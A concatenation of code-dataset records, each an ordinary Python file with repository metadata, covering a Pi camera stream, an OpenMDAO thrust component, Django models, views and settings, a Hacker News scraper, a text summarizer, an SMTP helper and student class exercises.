# let camera warm up
camera.start_preview()
time.sleep(2)
stream = io.BytesIO()
for foo in camera.capture_continuous(stream, 'jpeg',
use_video_port=True):
# store frame
stream.seek(0)
cls.frame = stream.read()
# reset stream for next frame
stream.seek(0)
stream.truncate()
# if there hasn't been any clients asking for frames in
# the last 10 seconds stop the thread
if time.time() - cls.last_access > 10:
break
cls.thread = None
|
[
"noreply@github.com"
] |
noreply@github.com
|
f9783dda5c1663e07679d767cb045a425f767f67
|
4d5adf020161db482e24ebe353c70567bb14a1a1
|
/propulsion/thrust_force.py
|
d428164ff1452e54121c2c0d3d3b5d6b1f3b8a11
|
[] |
no_license
|
leamichel97/prop-solid
|
1403b9abd6a73fda6906dfe5de5543e59d2508ad
|
c81bf700ee07b304d550c47a5afa85e476ecb38d
|
refs/heads/master
| 2022-12-18T12:50:54.042165
| 2020-09-03T10:16:46
| 2020-09-03T10:16:46
| 253,484,751
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,781
|
py
|
# -*- coding: utf-8 -*-
"""
thrust_force.py generated by WhatsOpt 1.10.1
"""
import numpy as np
from propulsion.thrust_force_base import ThrustForceBase
class ThrustForce(ThrustForceBase):
""" An OpenMDAO component to encapsulate ThrustForce discipline """
def compute(self, inputs, outputs):
""" ThrustForce computation """
if self._impl:
# Docking mechanism: use implementation if referenced in .whatsopt_dock.yml file
self._impl.compute(inputs, outputs)
else:
Ae = inputs['Ae']
Pa = inputs['Pa']
Pe = inputs['Pe']
prop_m = inputs['prop_m']
Ve = inputs['Ve']
zeta = inputs['zeta']
F_T = zeta * ((prop_m * Ve) + (Ae * (Pe - Pa)))
outputs['F_T'] = F_T
return outputs
# Reminder: inputs of compute()
#
# inputs['Ae'] -> shape: (1,), type: Float
# inputs['Pa'] -> shape: (1,), type: Float
# inputs['Pe'] -> shape: (1,), type: Float
# inputs['prop_m'] -> shape: (1,), type: Float
# inputs['Ve'] -> shape: (1,), type: Float
# inputs['zeta'] -> shape: (1,), type: Float
# To declare partial derivatives computation ...
#
# def setup(self):
# super(ThrustForce, self).setup()
# self.declare_partials('*', '*')
#
# def compute_partials(self, inputs, partials):
# """ Jacobian for ThrustForce """
#
# partials['F_T', 'Ae'] = np.zeros((1, 1))
# partials['F_T', 'Pa'] = np.zeros((1, 1))
# partials['F_T', 'Pe'] = np.zeros((1, 1))
# partials['F_T', 'prop_m'] = np.zeros((1, 1))
# partials['F_T', 'Ve'] = np.zeros((1, 1))
# partials['F_T', 'zeta'] = np.zeros((1, 1))
|
[
"leamichel1497@gmail.com"
] |
leamichel1497@gmail.com
|
7e595d3e782adea8924f7a1dd1432bd467b968e7
|
6ede75099fc38a682e030d70051389ea182d6cc2
|
/ともき本番/incomeexpensesapi/menu/migrations/0028_foodstuff_myrecipe_usereat.py
|
b1c52866aa49cd76e4c04d5b33843c23ec472259
|
[] |
no_license
|
hangtran93tk/team06
|
0d86e59be866d7f6bda1b6c81f725ca1f80eba0f
|
89000be20c18d3b9610c240b25c7c1944fc68d6d
|
refs/heads/master
| 2023-03-12T11:58:03.802711
| 2021-02-26T03:51:36
| 2021-02-26T03:51:36
| 279,473,813
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,149
|
py
|
# Generated by Django 3.0.5 on 2020-12-20 06:56
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('menu', '0027_menuinfo'),
]
operations = [
migrations.CreateModel(
name='Foodstuff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255, null=True)),
('one_point_gram', models.FloatField()),
('one_point', models.FloatField()),
('two_point', models.FloatField()),
('three_point', models.FloatField()),
('four_point', models.FloatField()),
],
),
migrations.CreateModel(
name='UserEat',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('eatTime', models.IntegerField(choices=[(1, '朝食'), (2, '昼食'), (3, '夕食'), (4, '間食')])),
('date', models.DateField(auto_now_add=True)),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatmenu', to='menu.MenuInfo')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='eatuser', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='MyRecipe',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gram', models.FloatField()),
('foodstuff', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipestuff', to='menu.Foodstuff')),
('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='recipemenu', to='menu.MenuInfo')),
],
),
]
|
[
"18jz0129@jec.ac.jp"
] |
18jz0129@jec.ac.jp
|
cb4ceece3e859d4af57c7b4bc35b7c12546e1c09
|
b329784883875fea0d655f4371549c400ab876a7
|
/news.py
|
5cc3035a0d6bf571d225ffb8a12fb412c8575b22
|
[] |
no_license
|
veekaybee/markovhn
|
9ce8b4159c483bbc0629bf9cc51d0eba591bd553
|
99f5eefc292fc511d1f89b1acbf1ba0199245b16
|
refs/heads/master
| 2021-01-23T18:50:48.906754
| 2015-08-24T11:46:41
| 2015-08-24T11:46:41
| 41,229,413
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 675
|
py
|
import urllib2
import json
#HackerNews API documentation: https://github.com/HackerNews/API
api_url='https://hacker-news.firebaseio.com/v0/topstories.json'
item_url='https://hacker-news.firebaseio.com/v0/item/'
#Pull all story numbers into a Python data dictionary
response = urllib2.urlopen(api_url)
data=json.load(response)
#Takes each story number and extracts the title by treating as Python dictionary
with open("headlines.txt", "w") as output_file:
for i in data:
genurl="%s%s.json?print=pretty" % (item_url, i)
item_response=urllib2.urlopen(genurl)
parsed_response=json.load(item_response)
output_file.write(parsed_response["title"].encode('utf-8'))
|
[
"vicki.boykis@gmail.com"
] |
vicki.boykis@gmail.com
|
e2450988f82302bcbaff58abb9d993b553804b16
|
0adbbf6092f5444b623ccbf3b81206d027c96b68
|
/23.py
|
ed2e63159145735c587c65da81d422e54ba334cf
|
[] |
no_license
|
c1c51/python-crap
|
bc3fe076e42aa0f5843879b7af56314b09e5f931
|
f16782fca27ac616e043b5e1c71da8fddef0f848
|
refs/heads/master
| 2021-05-10T09:55:38.465484
| 2018-01-25T17:19:57
| 2018-01-25T17:19:57
| 118,942,213
| 0
| 0
| null | 2018-01-25T17:20:37
| 2018-01-25T17:02:40
|
Python
|
UTF-8
|
Python
| false
| false
| 125
|
py
|
w=int(input("width?"))
l=int(input("length?"))
r=int(input("radius?"))
print((w*l)-((r*r)*3.14159265358979323846264338))
|
[
"noreply@github.com"
] |
noreply@github.com
|
e4a7172c8a987feebc4e08c448cc4dc8bfc40b73
|
913334a96677deb9a199d4a7244a4fa56e989fa7
|
/5flask_demo/modles.py
|
b90abf5bc7e9a32e86e2ee62ce28a818258daaff
|
[] |
no_license
|
KangZhengweiGH/flask_demos
|
7bd4b64f252055017f512f6fb348c885c377f241
|
1a0c621c8f0bd44fd583b026ef575990b5dda706
|
refs/heads/master
| 2020-05-16T07:28:24.055118
| 2019-05-08T01:00:30
| 2019-05-08T01:00:30
| 182,879,507
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
# coding=utf-8
from extend import db
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(12), nullable=True, unique=True)
telnumber = db.Column(db.Integer, nullable=False, unique=True)
password = db.Column(db.String(100), nullable=False)
vip = db.Column(db.BOOLEAN, default=False)
isdelate = db.Column(db.BOOLEAN, default=False)
logintime = db.Column(db.DateTime, nullable=True)
category_book = db.Table('category_book',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('book_id', db.Integer, db.ForeignKey('book.id'), primary_key=True))
category_chapter = db.Table('category_chapter',
db.Column('category_id', db.Integer, db.ForeignKey('category.id'), primary_key=True),
db.Column('chapter_id', db.Integer, db.ForeignKey('chapter.id'), primary_key=True))
class Category(db.Model):
__tablename__ = 'category'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
fatherc_id = db.Column(db.Integer, db.ForeignKey('fatherc.id'))
fatherc = db.relationship('Fatherc', backref=db.backref('categorys'))
class Fatherc(db.Model):
__tablename__ = 'fatherc'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
class Book(db.Model):
__tablename__ = 'book'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
introduce = db.Column(db.Text, nullable=True)
book_image = db.Column(db.String(50), nullable=True)
isdelate = db.Column(db.BOOLEAN, default=False)
# 这个外键就不需要了,呀好坑
# category_id = db.Column(db.Integer, db.ForeignKey('category.id'))
category = db.relationship('Category', secondary=category_book, backref=db.backref('books'))
class Chapter(db.Model):
__tablename__ = 'chapter'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.String(50), nullable=False)
need_vip = db.Column(db.BOOLEAN, default=False)
book_id = db.Column(db.Integer, db.ForeignKey('book.id'))
book = db.relationship('Book', backref=db.backref('chapters'))
category = db.relationship('Category', secondary=category_chapter, backref=db.backref('chapters'))
# class Artical(db.Model):
# __tablename__ = 'articals'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
#
#
# class Comment(db.Model):
# __tablename__ = 'comments'
# id = db.Column(db.Integer, primary_key=True, autoincrement=True)
# name = db.Column(db.String(50), nullable=False)
# content = db.Column(db.text, nullable=False)
|
[
"email@1101186901.com"
] |
email@1101186901.com
|
6d99627b90704b1feee0b966f1164aaffdfc291c
|
ad0e6decddcbd6bafce08075c04fcc5d1824513e
|
/abs_try.py
|
50b59bf80a1f14f6df5525812e0a4ffb13972103
|
[] |
no_license
|
sihanj/nlp_test2
|
dc95cf087dfd9a799e83a7fb4d8b543e51153dcc
|
4cd10b90ebe19724fa17f254be62574bb069987a
|
refs/heads/master
| 2020-03-25T20:54:16.004753
| 2019-04-22T04:46:05
| 2019-04-22T04:46:05
| 144,150,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,840
|
py
|
import re
import jieba
import networkx as nx
from sklearn import feature_extraction
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
#分句
def cut_sentence(sentence):
if not isinstance(sentence,str):
sentence=sentence.decode('utf-8')
delimiters=frozenset(u'。?!')
buf=[]
for ch in sentence:
buf.append(ch)
if delimiters.__contains__(ch):
yield ''.join(buf)
buf=[]
if buf:
yield ''.join(buf)
#停用词
def load_stopwords(path='stopwords.txt'):
with open(path,encoding='utf-8') as f:
stopwords=filter(lambda x:x,map(lambda x:x.strip(),f.readlines()))
#stopwords.extend([' ','\t','\n'])
return frozenset(stopwords)
#分词
def cut_words(sentence):
stopwords=load_stopwords()
return filter(lambda x: not stopwords.__contains__(x),jieba.cut(sentence))
#摘要
def get_abstract(content,size=3):
docs=list(cut_sentence(content))
tfidf_model=TfidfVectorizer(tokenizer=jieba.cut,stop_words=load_stopwords())
tfidf_matrix=tfidf_model.fit_transform(docs)
normalized_matrix=TfidfTransformer().fit_transform(tfidf_matrix)
similarity=nx.from_scipy_sparse_matrix(normalized_matrix*normalized_matrix.T)
scores=nx.pagerank(similarity)
tops=sorted(scores.items(),key=lambda x:x[1],reverse=True)
size=min(size,len(docs))
indices=list(map(lambda x:x[0],tops))[:size] #list
return map(lambda idx:docs[idx],indices)
a=input('请输入文档:')
a= re.sub(u'[ , ]',u'',a)
print('摘要为:')
abs=[]
for i in get_abstract(a):
abs.append(i)
print(str(abs).replace("'",'').replace(",",'').replace(" ","").replace("[","").replace("]",""))
input('任意键退出程序')
|
[
"noreply@github.com"
] |
noreply@github.com
|
11c23983d7ab4baebc227f5160e0120c3f42e04c
|
c0397a0617f2603dc5dbd0af44462e561a52ea18
|
/views.py
|
1b14f569ef0fd7a8ea1427db41bf9e8082f69ff5
|
[] |
no_license
|
PujariSrinivas/Django
|
c865dddfaef3e7221597cf9f5e911241300d2825
|
e94333926daef4a478ffa83c0f6c997700427696
|
refs/heads/master
| 2023-06-05T19:14:55.633274
| 2021-06-25T04:50:41
| 2021-06-25T04:50:41
| 378,155,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("Hi Good Evening to All...")
def htmltag(y):
return HttpResponse("<h2>Hi Welcome to APSSDC</h2>")
def usernameprint(request,uname):
return HttpResponse("<h2>Hi Welcome <span style='color:green'>{}</span></h2>".format(uname))
def usernameage(request,un,ag):
return HttpResponse("<h3 style='text-align:center;background-color:green'>My name is <span style='color:yellow'>{}</span> and my age is: <span style='color:red'>{}</span></h3>".format(un,ag))
def empdetails(request,eid,ename,eage):
return HttpResponse("<script>alert('Hi Welcome {}')</script><h3>Hi Welcome {} and your age is {} and your id is {}</h3>".format(ename,ename,eage,eid))
def htm(request):
return render(request,'html/basics.html')
def ytname(request,name):
return render(request,'html/ytname.html',{'n':name})
def empname(request,id,name):
k = {'i':id,'n':name}
return render(request,'html/ehtml.html',k)
def studentdetails(request):
return render(request,'html/stud.html')
def internaljs(request):
return render(request,'html/internaljs.html')
def myform(request):
if request.method=="POST":
#print(request.POST)
uname = request.POST['uname']
rollno = request.POST['rollno']
email = request.POST['email']
print(uname,rollno,email)
data = {'username':uname,'rno':rollno,'emailid':email}
return render(request,'html/display.html',data)
return render(request,'html/form.html')
def bootstrap(request):
return render(request,'html/boot.html')
def Registration(request):
if request.method=="POST":
fname = request.POST['fname']
lname = request.POST['lname']
rollno = request.POST['rollno']
email = request.POST['email']
phoneno = request.POST['phoneno']
print(fname,lname,rollno,email,phoneno)
data = {'firstname':fname,'lastname':lname,'rno':rollno,'emailid':email,'pno':phoneno}
return render(request,'html/Registration.html')
|
[
"noreply@github.com"
] |
noreply@github.com
|
23fbea60c2bea452a414dcf5f255cd4eabdab38a
|
437e905d8c214dc25c559b1dc03eaf9f0c85326f
|
/is28/vyacheslavleva28/lab6/function.py
|
1522faa137dc1fcb8f84d4cc4b96a551fd47870d
|
[] |
no_license
|
AnatolyDomrachev/karantin
|
542ca22c275e39ef3491b1c0d9838e922423b5a9
|
0d9f60207e80305eb713fd43774e911fdbb9fbad
|
refs/heads/master
| 2021-03-29T03:42:43.954727
| 2020-05-27T13:24:36
| 2020-05-27T13:24:36
| 247,916,390
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
def vvod():
a = []
for i in range(10):
x = float(input())
a.append(x)
return a
def rachet(a):
res = True
for i in range(0,len(a)-1):
if a[i]> a[i+1]:
res = False
return res
def vyvod(data):
print(result)
data = vvod()
print(data)
result = rachet(data)
print(result)
vyvod(result)
print(vyvod)
|
[
"you@example.com"
] |
you@example.com
|
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1
|
f5f7f8d12956e4bff6e1c5f6fab10b006690f195
|
/luffy/settings.py
|
fe7c34ae1af2839496be8ef590c0c49e0a16121b
|
[] |
no_license
|
chenrun666/luffy
|
1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846
|
59f6229e16978ab9c40ef948807c717c2cddaea9
|
refs/heads/master
| 2020-04-07T16:09:20.306754
| 2018-11-21T08:45:29
| 2018-11-21T08:45:29
| 158,517,404
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,582
|
py
|
"""
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
|
[
"17610780919@163.com"
] |
17610780919@163.com
|
3263908d9d30879e4febda3d96c3f7a74b399214
|
9a21850ff752b6bd148a9dfbadd210419c2d4a6e
|
/posts/posts.py
|
39bb7bcbfa0e3cbcd84aaeef44c77b06619a2603
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
importcjj/Posts
|
7d3a9a04f829e92027c310f0daf8be259d4a91a9
|
fc2abe1c48fa09af820a25c4cc00520253a6b7f1
|
refs/heads/master
| 2021-01-10T09:43:07.401682
| 2016-04-20T05:24:36
| 2016-04-20T05:24:36
| 49,366,691
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,705
|
py
|
# -*- coding: utf-8 -*-
import smtplib
import socket
from contextlib import contextmanager
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
class PostSMTP(smtplib.SMTP):
def __init__(self, sender, alias=None, host='', port=0,
local_hostname=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
smtplib.SMTP.__init__(self, host, port, local_hostname, timeout)
self._sender = sender
self._sender_alias = alias if alias else sender.split('@')[0]
self._attachments = {}
self._mails = []
def attach(self, attachments):
"""Add attachments.
Args:
attachments (dict): attachments
example: {'alias_name': 'path/to/filename'}
Returns:
obj to support chain calling.
"""
try:
iteritems = attachments.iteritems()
except AttributeError:
iteritems = attachments.items()
for k, v in iteritems:
self._attachments[k] = v
return self
def _header(self, msg, recipient, subject):
msg['Subject'] = subject
msg['From'] = '{} <{}>'.format(self._sender_alias, self._sender)
msg['To'] = ', '.\
join(recipient) if isinstance(recipient, list) else recipient
return msg
def _mount(self, mail, files):
for _ in files:
mail['msg'].attach(_)
return mail
def _load_files(self):
files = []
try:
iteritems = self._attachments.iteritems()
except AttributeError:
iteritems = self._attachments.items()
for k, v in iteritems:
with open(v, 'rb') as f:
part = MIMEApplication(f.read())
part.add_header('Content-Disposition', 'attachment', filename=k)
part.add_header('Content-ID', '<{}>'.format(k))
files.append(part)
return files
def text(self, recipient, subject, content, charset='us-ascii'):
_text = MIMEText(content, _subtype='plain', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_text)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def html(self, recipient, subject, content, charset='utf-8'):
_html = MIMEText(content, _subtype='html', _charset=charset)
_msg = MIMEMultipart()
_msg = self._header(_msg, recipient, subject)
_msg.attach(_html)
self._mails.append({
'recipient': recipient,
'msg': _msg
})
return self
def _send(self):
files = self._load_files()
for mail in self._mails:
self._mount(mail, files)
self.sendmail(
self._sender,
mail['recipient'],
mail['msg'].as_string())
class Posts(object):
def __init__(self, host, usermame, password, port=25):
self._host = host
self._port = port
self._username = usermame
self._password = password
@contextmanager
def __call__(self, sender=None, alias=None, ssl=False):
sender = sender if sender else self._username
self._smtp = PostSMTP(sender, alias)
self._smtp.connect(self._host)
if ssl:
self._smtp.ehlo()
self._smtp.starttls()
self._smtp.ehlo()
self._smtp.login(self._username, self._password)
try:
yield self._smtp
self._smtp._send()
finally:
self._smtp.quit()
|
[
"importcjj@gmail.com"
] |
importcjj@gmail.com
|
b6075930272e040694012e964f04ec7d4bd71de8
|
7b314c39de4851891f334017f10698b30edbf610
|
/main.py
|
527531e35463c73e1899b1f65945dd95519f8a2a
|
[] |
no_license
|
angelolihas/testapp1api
|
8720d6e0b4bbdeb4f048583f64ad3fd33eb9e371
|
dfa12a8c83d00eaa6d060997dd759580a7956bf6
|
refs/heads/master
| 2023-01-07T03:10:22.156623
| 2020-11-12T23:49:40
| 2020-11-12T23:49:40
| 312,423,850
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
import requests
def get_request():
response = requests.get('URL')
json_response = response.json()
print(json_response)
return json_response
if __name__ == '__main__':
get_request()
|
[
"angelo.lihas@gmail.com"
] |
angelo.lihas@gmail.com
|
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75
|
eb61d62ca1f6f0123e3771105f5dfbbd6115138d
|
/.history/23-08-21_20210912011408.py
|
d242edf35564cc66ff35c5dd66a540fa6f9fc0b8
|
[] |
no_license
|
Alopezm5/CORRECTO-2
|
e0f14bcc3a88c0e222d10e3261e68532008bc42e
|
223613f1fb04dce3fac9f82f243cb2f22fe100f3
|
refs/heads/main
| 2023-07-29T06:52:48.147424
| 2021-09-12T20:33:27
| 2021-09-12T20:33:27
| 388,995,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,944
|
py
|
class Empresa:
def __init__(self,nom="El mas barato",ruc="0999999999",tel="042971234",dir="Juan Montalvo"):
self.nombre=nom
self.ruc=ruc
self.telefono=tel
self.direccion=dir
def mostrarEmpresa(self):
print("Empresa: {:17}, RUC: {}".format(self.nombre,self.ruc))
class Cliente:
def __init__(self,nom,ced,tel):
self.nombre=nom
self.cedula=ced
self.telefono=tel
def mostrarCliente(self):
print(self.nombre,self.cedula,self.telefono)
class ClienteCorporativo(Cliente):
def __init__(self,nomb,cedu,telecontrato):
super().__init__(nomb,cedu,tele,contrato)
self.__contrato=contrato
@property
def contrato(self): #getter: obtener el valor del atributo privado
return self.__contrato
@contrato.setter
def contrato(self,value): #setter: asigna el valor del atributo privado
if value:
self.__contrato=value
else:
self.__contrato="Sin contrato"
def mostrarCliente(self):
print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
def __init__(self,nom,ced,tel,promocion=True):
super().__init__(nom,ced,tel,)
self.__promocion=promocion
@property
def promocion(self): #getter: obtener el valor del atributo privado
return self.__promocion
def mostrarCliente(self):
print(self.nombre, self.__promocion)
class Articulo:
secuencia=0
iva=0.12
def __init__(self,des,pre,sto):
Articulo.secuencia+=1
self.codigo=Articulo.secuencia
self.descripcion= des
self.precio=pre
self.stock=sto
def mostraArticulo(self):
print(self.codigo,self.nombre)
class DetVenta:
linea=0
def __init__(self,articulo,cantidad):
DetVenta.linea+=1
self.lineaDetalle=DetVenta.linea
self.articulo=articulo
self.precio=articulo.precio
self.cantidad=cantidad
class CabVenta:
def __init__(self,fac,empresa,fecha,cliente,tot=0):
self.empresa=empresa
self.factura=fac
self.fecha=fecha
self.cliente=cliente
self.total=tot
self.detalleVen=[]
def agregarDetalle(self,articulo,cantidad):
detalle=DetVenta(articulo,cantidad)
self.total+=detalle.precio*detalle.cantidad
self.detalleVen.append(detalle)
def mostrarVenta(self,empNombre,empRuc):
print("Empresa {:17} r")
# emp=Empresa("El mas barato","0953156049","0998132446","Coop. Juan Montalvo")
# emp.mostrarEmpresa()
# print(emp.nombre)
cli1=ClientePersonal("Jose","0912231499","042567890",True)
cli1.mostrarCliente
art1=Articulo("Aceite",2,100)
art1.mostraArticulo()
art2=Articulo("Coca Cola",1,200)
art2.mostraArticulo()
art3=Articulo("Leche",1.5,200)
art3.mostraArticulo()
print(Articulo.iva())
|
[
"85761855+Alopezm5@users.noreply.github.com"
] |
85761855+Alopezm5@users.noreply.github.com
|
06aae58ab947c90ed7bc942a02ffa420afd0287b
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py
|
711d740178ee303c6379e1c1ec389c67bd15cca7
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972
| 2023-08-25T07:40:41
| 2023-08-25T07:40:41
| 160,391,444
| 18
| 29
|
BSD-2-Clause
| 2023-09-08T09:08:30
| 2018-12-04T17:02:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,335
|
py
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"tlewis@purestorage.com"
] |
tlewis@purestorage.com
|
74e35392f5c4e36cd4980a15661af109baa74410
|
516b2b403bf9033fe4fedbab014b09710b21efd8
|
/mdts/mdts.py
|
276c7c6a84fff8ebb04f5ac5bc9d6d9c772bbdba
|
[] |
no_license
|
usccolumbia/MDTS
|
77f4960a975b1b4f0ff2425e1dee5c23deafaba5
|
